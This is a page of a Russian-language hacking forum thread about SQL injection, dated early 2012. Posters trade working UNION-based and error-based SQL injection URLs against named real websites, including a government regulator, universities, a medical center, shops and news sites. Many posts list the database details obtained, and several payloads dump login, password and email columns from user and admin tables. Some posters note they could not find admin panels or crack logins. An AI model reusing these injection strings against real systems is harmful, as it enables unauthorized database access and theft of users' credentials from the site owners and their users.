SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 730 of 798
  1. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Это надо постить в тему с вопросами и там фильтрация не только пробелов.
     
    #14581 gl0w, 23 Jan 2012
  2. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.[B]atlanticframe.com[/B]/detail.php?id=[B][COLOR=YellowGreen]-[/COLOR][/B]1[B][COLOR=YellowGreen]+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+[/COLOR][/B]
    PR: 3

    version: 5.0.91
    database: Website2009
    user: [email protected]

    Официальный сайт Федеральной службы по надзору в сфере образования и науки // Для истории (уязвимость залатали)
    Code:
    http://[B][COLOR=YellowGreen]obrnadzor.gov.ru[/COLOR][/B]/ru/press_center/gallery/index.php?album_id40=35[B][COLOR=YellowGreen]'sql-injection'[/COLOR][/B]
    тИЦ: 3300 / PR: 8
     
    #14582 mix0x0, 23 Jan 2012
    3 people like this.
  3. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    Кафедра квантовой физики МГУ
    PR = 4
    Code:
    http://nanolab.phys.msu.ru/person.php?lang=rus&id=-29+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12,13+from+user--
    При выводе пароля обрезает union
     
    #14583 brain, 23 Jan 2012
    2 people like this.
  4. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Университет на Гаваях.

    Code:
    http://hilo.hawaii[COLOR=Red].edu[/COLOR]/academics/hohonu/writing.php?id=1-666.666+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),2,3,4,5,6--
    Database Version: 5.0.92-log
    Database name: hohonu
    User name: [email protected]

    ТИЦ: 800
    PR: 7
     
    #14584 HellFire, 24 Jan 2012
    3 people like this.
  5. brain

    brain Elder - Старейшина

    Joined:
    4 Jul 2010
    Messages:
    249
    Likes Received:
    90
    Reputations:
    33
    Федеральное государственное учреждение "Федеральный медицинский биофизический центр имени А.И.Бурназяна"
    ТиЦ = 80
    PR = 4
    Code:
    http://www.fmbcfmba.ru/index.php?type=page&page_id=-10+union+select+1,2,table_name,4,5,6,version%28%29+from+information_schema.tables%20--
     
    #14585 brain, 25 Jan 2012
    1 person likes this.
  6. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Американская золотая биржа.

    Code:
    http://www.amergold.com/vault/numisdetails.php?id=1-666.666+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),9,10,11,12,13,14--
    Database Version: 5.0.77
    Database name: age
    User name: amergold@localhost

    ТИЦ: 10
    PR: 4

    Газета Financial Express (Бангладеш).

    Code:
    http://www.thefinancialexpress-bd.com/innerpage.php?page_category_id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71)--
    Database Version: 5.0.92-50-log
    Database name: thefinan_db
    User name: thefinan_fe@localhost

    ТИЦ: 20
    PR: 5
     
    #14586 HellFire, 26 Jan 2012
    Last edited: 26 Jan 2012
    1 person likes this.
  7. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 110 Траф 1К
    Code:
    http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5--+
    iwanttobeh_biu@localhost:iwanttobeh_bi:5.1.46
    Code:
    http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,name,info%29,3,4,5+from+magazine--+
    :eek:
     
    #14587 aydin-ka, 27 Jan 2012
    1 person likes this.
  8. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    PR: 5
    Alexa Rank: 187,654

    OS: Linux Red Hat Enterprise 5 (Tikanga)
    Database: MySQL > 5
    User: root@localhost
    file_priv Y

    Сразу выложу БД, чтобы не мучались : ))
    information_schema
    myaccount
    mysql
    newsletters
    shop3Msearch
    WDSR
     
    #14588 gl0w, 27 Jan 2012
  9. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 100 Траф 1К
    Code:
    http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--+
    bg@localhost:bg:5.0.51a-24+lenny5-log
    Code:
    http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,group_concat%280x3a,usersName,usersEmail%29,3,4,5,6,7,8,9,10,11+from+users_t--+
    http://www.braingames.ru/admin - 403 :(
     
    #14589 aydin-ka, 27 Jan 2012
  10. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Яндекс тИЦ 60
    Google Page Rank 4/10
    Админку так и не нашёл =(
     
    _________________________
    #14590 VY_CMa, 28 Jan 2012
    Last edited: 28 Jan 2012
    2 people like this.
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://www.respo.ru/catalog.php?page=1&type=-7+union+select+1,user(),version(),4,5,6,7--+f
     
    #14591 Ereee, 29 Jan 2012
    2 people like this.
  12. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Магазин ShareWare софта.

    Code:
    http://www.sharewareriver.com/product.php?id=10000-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    Database Version: 5.0.91-log
    Database name: a0020843
    User name: [email protected]

    ТИЦ: 30
    PR: 4
     
    #14592 HellFire, 29 Jan 2012
  13. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 300
    Code:
    http://www.alt-x.ru/help/works_outside.php?page_id=99999999+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10--+
    [email protected]:gb_altx2:5.1.52-log
     
    #14593 aydin-ka, 30 Jan 2012
    4 people like this.
  14. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 100
    Code:
    http://crdz.ru/view.php?id=999999999+union+select+1,@@version,3,4--+
    Вывод в теге "title" 4.1.20-log
    Code:
    http://crdz.ru/view.php?id=999999999+union+select+1,id,3,4+from+users--
    Логин сбрутить не смог :(
     
    #14594 aydin-ka, 31 Jan 2012
    1 person likes this.
  15. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://tools.biz.ua/index.php?category=3-0.9999+union+select+1,version(),3,4,5,6,7--+
    http://energo.biz.ua/index.php?category=5-0.9999+union+select+1,version(),3,4,5,6,7--+
    http://food.biz.ua/index.php?category=1-0.9999+union+select+1,version(),3,4,5,6,7--+
    http://catalog.biz.ua/index.php?category=12-0.9999+union+select+1,group_concat(0x0b,table_name),3,4,5,6,7+from+information_schema.tables--+
     
    #14595 bodrich, 31 Jan 2012
    Last edited: 31 Jan 2012
    2 people like this.
  16. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Торговая железнодорожная площадка.

    Code:
    http://railtransport.ru/index.php?page=show_zapchast&id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),2,3--
    Database Version: 5.5.1-m2-log
    Database name: db42618m
    User name: [email protected]

    ТИЦ: 50
    PR: 3
     
    #14596 HellFire, 31 Jan 2012
    2 people like this.
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Магазин мобильных приложений

    Site: mappn.com


    Inject
    Code:
    _ttp://mappn.com/soft.php?id=2+/*%2130000and(select+1+from(select+count(*),concat((select+(select+(select+@@version)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1*/
    Version: 5.0.45
    User: [email protected]
    Database: mappn

    PR: 5
    TYC: 10
     
    _________________________
    #14597 BigBear, 31 Jan 2012
  18. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    Code:
    http://t-nalog.ru/news.php?n=29'+and+0+UNION+SELECT+1,group_concat(concat_ws(0x3a,login,password,email)),3,4,5+FROM+users+--+
http://www.it4life.ru/cat.php?typeid=5589+and+0+UNION+SELECT+1,group_concat(concat_ws(0x3a,login,pswd))+FROM+adm+--+
http://www.dip8.ru/shop.php?gr=7&subgr=11+and+0+UNION+SELECT+group_concat(concat_ws(0x3a,login,parol)),2,3+FROM+it_a_autorize+--+
http://gmg2011.motoguzzi.com/news.php?news=15'+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11+--+
http://www.mcdracing.com/news.php?news=31+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9+--+
http://www.unutki.org/news.php?news_id=123&doc_id=6+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database()),2,3,4+--+
http://www.thelondonfiltercompany.com/news.php?news_id=1+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4+--+
http://www.educavision.com/news.php?news_number=4+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7+--+
http://www.norcotek.com/news.php?news_id=32+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4+--+
http://www.ontheminute.com/news/news.php?news=31114+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12+--+
http://www.shamass.org/news.php?news_id=52+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11+--+
http://www.delawarelawweekly.com/news.php?news_id=2896+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://deepsouthmedia.co.uk/view-news.php?news_id=198'+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5+--+
http://www.mammacare.com/news.php?news_id=6+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+ html body
http://www.arrowpoint.net/news.php?news_id=702+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,user(),version(),database()),28+--+
http://www.evolvedance.co.uk/news.php?news_id=0+and(select+1+from(select+count(*),concat((concat_ws(0x3a,user(),version(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
     
    #14598 totenkopf, 1 Feb 2012
    Last edited: 1 Feb 2012
    2 people like this.
  19. [stranger]

    [stranger] Member

    Joined:
    2 Feb 2010
    Messages:
    167
    Likes Received:
    29
    Reputations:
    4
    u_dabi@localhost;dabi
    5.0.51a-24+lenny5
     
    #14599 [stranger], 2 Feb 2012
    2 people like this.
  20. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    ТИЦ 350
    Code:
    http://www.agidel.ru/?rid=10&param1=99999999+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,7,8,9,10--+
    [email protected]:main:4.1.22-log
     
    #14600 aydin-ka, 3 Feb 2012
    1 person likes this.
(You must log in or sign up to post here.)
Page 730 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.